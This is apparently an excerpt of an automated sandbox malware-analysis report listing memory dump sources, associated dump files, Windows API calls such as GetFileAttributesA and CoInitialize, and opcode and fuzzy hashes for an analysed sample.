                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 0edf8a71e0f4a22ebdd92bef84a614770f4546cf5bc78fc405d7ed8585732abf
                                                                                                                                                                                                                                • Instruction ID: d84be49dbfffbe752c39ad31350af68b24b7cfec4d2f5d6099edd3b61bee9320
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0edf8a71e0f4a22ebdd92bef84a614770f4546cf5bc78fc405d7ed8585732abf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AF08931505625E6EB717B769C05A9B7799FF55770F298323ED88971C1DE20DC0087E0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 3a00b62d3b94cdadb173a0fdb412f9bf5312ed77dc19a95b45896f9332440112
                                                                                                                                                                                                                                • Instruction ID: c972a7d760b482c18964e0896d8950c8a80ec2eb9d837792ea240f66a973be22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a00b62d3b94cdadb173a0fdb412f9bf5312ed77dc19a95b45896f9332440112
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AC08C2801960406FD1C053C00898AB33854B4F7AB3F45F94EC74AF2E1DA75EC4F9360
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,0005DA1D,?,?,?,?), ref: 000587B9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 71bd7500e628be7473bd624a476ac4810d326b2bcd610cc4930d28fc81d5e314
                                                                                                                                                                                                                                • Instruction ID: 9cb5010862af1c6688dd120d849effcd2685bac0352f34cc57fbcfe8a5b1b959
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71bd7500e628be7473bd624a476ac4810d326b2bcd610cc4930d28fc81d5e314
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBC08C3801920446FA1C4A3C508882732859B0B72B3F04FA8EC31AF2E1DBB2D84BC7A0
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0005B3C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1765112724.0000000000051000.00000040.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765048941.0000000000050000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1765112724.00000000000B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766361943.00000000000B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766392814.00000000000BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766425098.00000000000C7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766597542.0000000000220000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766617765.0000000000222000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766671631.0000000000235000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766691132.0000000000237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000238000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766710949.0000000000243000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766745801.0000000000247000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766765521.0000000000248000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766789322.0000000000256000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766806533.000000000025C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766827383.0000000000272000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766846764.0000000000273000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766867055.000000000027B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766886363.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766903399.0000000000281000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766925111.0000000000288000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766949731.00000000002A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766967269.00000000002AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1766984198.00000000002AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767005534.00000000002B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767026003.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767043084.00000000002C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767062597.00000000002D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767084322.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767104813.00000000002D6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767121901.00000000002D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767140293.00000000002DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767160553.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767183483.00000000002F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767201271.00000000002F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767219302.00000000002F4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767235186.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767251872.00000000002FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767267554.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767311355.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767327621.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767342569.000000000034F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767357466.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767375043.0000000000354000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767392869.0000000000362000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767408780.0000000000363000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767424419.0000000000364000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.1767439354.0000000000365000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                • Opcode ID: b86c4f9edc59192988329f11f102bea49876e2d6e38e593f1eaf32cf0f1590be
                                                                                                                                                                                                                                • Instruction ID: a72ebcdfa8ca3628ebc51bfe2adfd66c9c5bbb1ffdef4d88c9be39b4571d1c64
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b86c4f9edc59192988329f11f102bea49876e2d6e38e593f1eaf32cf0f1590be
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 70B11870A10268DFEB29CF14CC98BDEB7B5EF15304F5085D9E80967281D775AA88CF91
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 7e2dbbd480d547846ef10f032d10b2a117a64587b0c8fab180ca8499ca5332e9
                                                                                                                                                                                                                                • Instruction ID: cbea0124d9fd8163f0d8f3f343d133d7adc2d52f55b7470ab16dcb030022548e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e2dbbd480d547846ef10f032d10b2a117a64587b0c8fab180ca8499ca5332e9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E31C0E724D118BE71428D851B54AB66B6EF6DB6383308F26F407CA542F2D43A7A7132
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.1770090191.00000000048A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_48a0000_file.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 55a18cb7e9209809d40c4c9bbb9e8c643312d3e0a18856fe51d7ff24042e1001
                                                                                                                                                                                                                                • Instruction ID: 1548395cfc78e6d1b50e83b1e90cc3407f33742842c81326c26f82953e64acaf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a18cb7e9209809d40c4c9bbb9e8c643312d3e0a18856fe51d7ff24042e1001
